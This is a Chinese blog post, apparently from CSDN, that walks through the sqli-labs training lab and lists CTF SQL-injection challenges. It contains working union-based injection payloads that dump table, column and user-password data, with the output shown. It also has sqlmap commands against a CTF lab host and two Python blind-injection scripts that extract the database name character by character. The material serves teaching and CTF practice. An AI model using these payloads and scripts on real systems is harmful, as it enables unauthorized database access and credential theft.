SQL注入

最新推荐文章于 2024-04-04 17:34:08 发布
最新推荐文章于 2024-04-04 17:34:08 发布
阅读量342 收藏 1
点赞数 2
分类专栏: 教程 CTF 文章标签: mysql sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40648358/article/details/104504314
版权

文章目录

README

  • CTFer
  • WEB狗
  • 持续更新
  • 乌市素质单男

Sqli-labs

README

Less-1|最基础的sql注入

  • 写第一个是因为一点过滤都没有,可以作为一些paylaod的实验
  • 传入参数?id=1回显
    less1_1
  • 传入入 ?id=1',报错,因为是第一关,所以没什么过滤,就不一一测试了,直接打paylaod
  • 传入?id=-1 'union select 1,2,database()--+,回显
Welcome    Dhakkan
Your Login name:2
Your Password:security
  • 其中security为database()的值
  • 传入?id=-1 'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+,获取表名,回显
Welcome    Dhakkan
Your Login name:2
Your Password:emails,referers,uagents,users
  • 传入?id=-1 'union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+获取本数据库中的user表的所有列名,回显
Welcome    Dhakkan
Your Login name:2
Your Password:id,email_id,id,referer,ip_address,id,uagent,ip_address,username,id,username,password
  • 传入?id=-1 'union select 1,group_concat(username),group_concat(password) from users--+,获取所有用户名和密码,回显
Welcome    Dhakkan
Your Login name:Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
Your Password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4

Less-5|最基础的盲注

  • 首先学习一下盲注基础
  • 经过对几个函数的学习,我们借用Less-5来学习一下脚本的编写
  • 和前几个Less不同,Less-5,不回显用户的数据,只有回显You are in...........
  • 我们先来测试一下这个语句?id=-1' or '1'='1,可以发现依然回显You are in...........
  • 语句?id=-1' or '1'='1是比较常用的几个测试是否存在注入的语句,可以巧用and,or,&,|等符号进行测试
  • 再构造一个payload?id=-1' or substr((select 1),1,1)=1%23,利用由于or后的语句为真,所以依旧会回显You are in...........
  • 测试payload?id=-1' or substr((select database()),1,1)='a'%23,使用这个payload,我们可以逐个字符爆出database()的结果,只需要更改substr()的第二个参数和与之比较的值(可以用=,>,<等)
  • 最简单的是使用sqlmap直接跑,这里我给出一些命令,就不写具体的回显结果了
# 判断是否存在注入点
./sqlmap.py -u "http://4729c696-0f41-440b-a796-98ca5f53b157.node3.buuoj.cn/Less-5/?id=1"
# 爆数据库名
# 在第一条语句后加上
--dbs
# 爆表名
# 在第一条语句的后面加上 -D 数据库名 --tables  如:
-D security --tables
# 爆列名
-D security -T users --columns
# 爆数据库内容
-D security -T users --dump-all
  • sqlmap在实战中是一种非常好用的工具
  • 可以通过配置,绕过各种waf
  • 但是为了能更好的学习盲注的原理,这里再示例一下脚本的编写
  • 先看一下requests库的使用–传送门
  • 编写一个最简单的脚本,直接遍历
import requests

# 脚本中paylaod又套了个ASCII是为了爆破的更加准确,直接用substr有时会大小写出现偏差
url = 'http://4729c696-0f41-440b-a796-98ca5f53b157.node3.buuoj.cn/Less-5/?id=-1\' or ascii(substr((select database()),{},1))={}%23'

s1 = requests.session()


res = '' #存放结果

for i in range(1,1000):
	tmp = res #记录res的值
	for j in range(32,127):#所有能输出的字符的ASCII值范围
		url_tmp = url.format(i,j)
		r1 = s1.get(url_tmp)
		if 'You are in.....' in  r1.text:
			res += chr(j)
			print(res)
			break
	if res == tmp: #遍历一遍ASCII的值,res还没改变说明已经爆破结束了
		print(res)
		exit(-1)
  • 但是直接遍历有时候效率很低
  • 所以我们在遍历的基础上稍加改进,采用>用二分法控制遍历,能提高不少效率
import requests

# 脚本中paylaod又套了个ASCII是为了爆破的更加准确,直接用substr有时会大小写出现偏差
url = 'http://4729c696-0f41-440b-a796-98ca5f53b157.node3.buuoj.cn/Less-5/?id=-1\' or ascii(substr((select database()),{},1))>{}%23'

s1 = requests.session()


res = '' #存放结果

for i in range(1,1000):
	tmp = len(res) #记录res的值
	high = 127
	low = 31
	mid = (low + high) // 2
	while high > low:
		url_tmp = url.format(i,mid)
		r1 = s1.get(url_tmp)
		if 'You are in.....' in  r1.text:
			low = mid + 1
		else:
			high = mid
		mid = (low + high) // 2
	res += chr(int(mid))
	print(res)
	if mid == 31: 
		print(res[:-1])
		print('end.......')
		exit(-1)

CTF真题

  • 基于其他的比赛题目
  • 有的只放脚本或其他比赛中的wp链接,不做过多描述

公益赛_ichunqiu_easysqli_copy|set…prepare…execute

公益赛_ichunqiu_Ezsqli|过滤in,union(.*?)select

公益赛_ichunqiu_blacklist|过滤select使用handler

[SUCTF 2019]EasySQL|sql_mode=PIPES_AS_CONCAT

[BJDCTF 2nd]简单注入|regexp binary 注入

「已注销」
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
sql注入攻击流量情况
07-18
sql注入攻击流量情况
MYSQL注入(Welcome Dhakkan)
qq_43613772的博客
07-19 7921
第一步打开phpStudy,点击启动 打开浏览器输入要登录的题目网址, 、在网址后面输?id=1看一下效果和在数字1后面加一个符号’比较一下 从上述错误当中,我们可以看到提交到 sql 中的 1’在经过 sql 语句构造后形成 ‘1’’ LIMIT 0,1, 多加了一个 ’ 。我们可以尝试一下后面加尝试 ‘or 1=1–+ 尝试成功,正常返回数据。 接下来对前面的数据进行排序,利用的是order ...
2018.11.24上海市网络安全大赛线下AWD感想杂谈
uiop_uiop_uiop的博客
11-24 1722
第一次参加线下赛,虽然对web方面的知识目前还不是很懂,这次比赛主要是去长长见识,并成功入坑web 比赛是9:30正式开始,大约在9:00的时候就到现场打开电脑进行准备操作了,期间是介绍某某嘉宾的开幕式不用管。这时候先把要启动的虚拟机软件啥的先准备好,然后仔细去阅读主办方下发的比赛材料。这里贴一下这次比赛我们的文档作为样例,理解全场环境的网络拓扑环境。把网线插上DHCP或者按照主办方要求修改IP...
Hackergame 2020部分题目WP
yemeinanhai的博客
11-07 1940
Writeup 第一篇博客,写的不好请见谅~ 作为一个刚接触CTF2个多月的大一萌新,感觉Hackergame的题目还是相当友好和好玩的,不像之前打的西湖论剑和N1CTF,除了签到,问卷啥也不会(>_<),真的直接打自闭~ 尽管这周打的很艰难,毕竟学生党要上课…但最后的成绩自己还是很满意的: 1.抢到了一道一血:一闪而过的flag 2.总排名:149(比赛刚开始 占据了第一名5分钟,巅峰时打到87名,然后就开始往下掉了QAQ~) 3.由于部分flag为动态flag,仅供参考。 签到 11:
WEEK 5
最新发布
aweiaaaaa的博客
04-04 1398
分析代码可知,还是按照之前的套路,每个流程逆着来一遍就好swap_bitscustom_addleakinput_strswap_bitsaainput_strcustom_add。
【西电Moectf2023-Jail-WP】
qq_33295410的博客
09-27 2558
它支持在源码行间设置(有条件的)断点和单步执行,检视堆栈帧,列出源码列表,以及在任何堆栈帧的上下文中运行任意 Python 代码。当各位玩家连接后 可以看到一个类似于菜单的东西.输入g(G)会获得挑战的源码,输入e(E)会进入挑战,输入c(C)会得到挑战的描述[题目里的会更加详细],输入q(Q)会退出。设置了两个功能,一个是漏洞利用,可以使用python下面函数查看环境变量,找到真正的key,再利用backdoor来getshell。手动在终端输入是不行的,需要使用脚本提交,贴上代码。
Sqli_lib Less 5
weixin_42357645的博客
09-25 363
Sqli_lib Less 5 Welcome Dhakkan Please input the ID as parameter with numeric value 相比Less 1-4 Less 5更有意思,这是一个简单的盲注。主要依赖几SQL函数: 函数 参数解释 返回值 version() 数据库版本字符串 length(1)/len(1) 1:字符串 数值 substr(1,2N,3N) 1:字符串 2:起始位置(第一位是1) 3:取N个字符 从2N开始的3N个字符
[GYCTF2020]Ezsqli
Mrs_H的博客
10-29 507
前言 前几天一直在忙课程的作业,话说实验课的实验是越来越多了。一直没有抽出时间来做sql注入的题目。这次又做了一道题目,这道题目可以说是让我又长知识了。同时,也正是这道题,让我对二分查找产生了怀疑,相关的细节问题我会在下一篇文章中说明。这篇文章总的来说就是一篇WP。 正文 首先这道题的前端很简单,就是一张网页上贴了一张画以及加了个搜索框。 通过尝试,我们发现,下面这个搜索框可以通过我们输入数字的不同而产生不同回显。但是经过sql字典的fuzz发现他过滤了in也就是说这道题的第一个考点在于informati
php代码审计之sql注入
qq_54030686的博客
12-05 1195
php代码审计之sql注入 审计有几种方法,通读,指定函数,或者功能点 通读也就是每一个php都阅读一下,发现每一个页面实现的功能(对于我刚开始接触php来说,不可能) 功能点 自己使用源码,phpstudy搭建环境,使用AWVA,appscan,nessus等工具进行扫描,在输入框,文件上传等功能点进行测试,还可以根据回显,例如:不允许此类型文件上传,使用seay审计系统查询,审计相关方法 此篇为sql注入 sql注入产生的原因:用户输入恶意构造的语句,服务器后端未进行足够的校验,恶意语句直接添加sql
Sqli-labs 靶场通关学习记录
eyyer的博客
02-13 1193
Sqli-labs 靶场通关学习记录
bugku ctf welcome to bugkuctf
qq_42777804的博客
08-08 708
首先使用burp进行抓包 <!-- $user = $_GET["txt"]; $file = $_GET["file"]; $pass = $_GET["password"]; if(isset($user)&&(file_get_contents($user,'r')==="welcome to the bugkuc...
pangolinsdl—sql注入工具
06-20
pangolinsdl—sql注入工具 很好用的sql注入工具 界面简洁好用 使用方便
超级sql注入工具
11-02
超级SQL注入工具(SSQLInjection)是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入,支持HTTPS模式注入。 超级SQL注入工具目前支持Bool型盲注、错误显示注入、...
sql注入网站源码
04-09
挺好的带有sql注入漏洞的asp网站源码,可以自行搭建环境。
SQL 注入天书.pdf
08-06
SQL 注入学习天书
SQL注入思路详解
12-14
一、SQL注入可以分为三个步骤 1.识别Web应用与数据库交互的可能输入(识别潜在注入点) 2.SQL注入语句测试 3.根据服务器返回判定注入语句是否影响了SQL执行结果以判断是否存在SQL注入     2.识别Web应用与数据库...
sql注入讲解ppt.pptx
08-10
sql注入一些基础知识的讲解
SQL注入fuzz字典
02-28
sql注入时很多关键的字符和关键字都过滤了,被称非法,一个一个测试不现实。可以使用该字典,用burp suite跑了一下来判断被过滤的字符。其中长度367表示可用,370表示非法字符,被过滤了。
metinfo 后台sql注入1
08-03
漏洞简介MetInfo是一套使用PHP和Mysql开发的内容管理系统。app/system/feedback/admin/feedback_admin.clas
postman sql注入
01-04
如果响应中包含SQL语法错误或其他与SQL注入相关的错误信息,那么说明存在SQL注入漏洞。 需要注意的是,Postman只是用于测试和验证API的工具,并不能直接修复或防止SQL注入漏洞。要修复和防止SQL注入漏洞,需要在...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值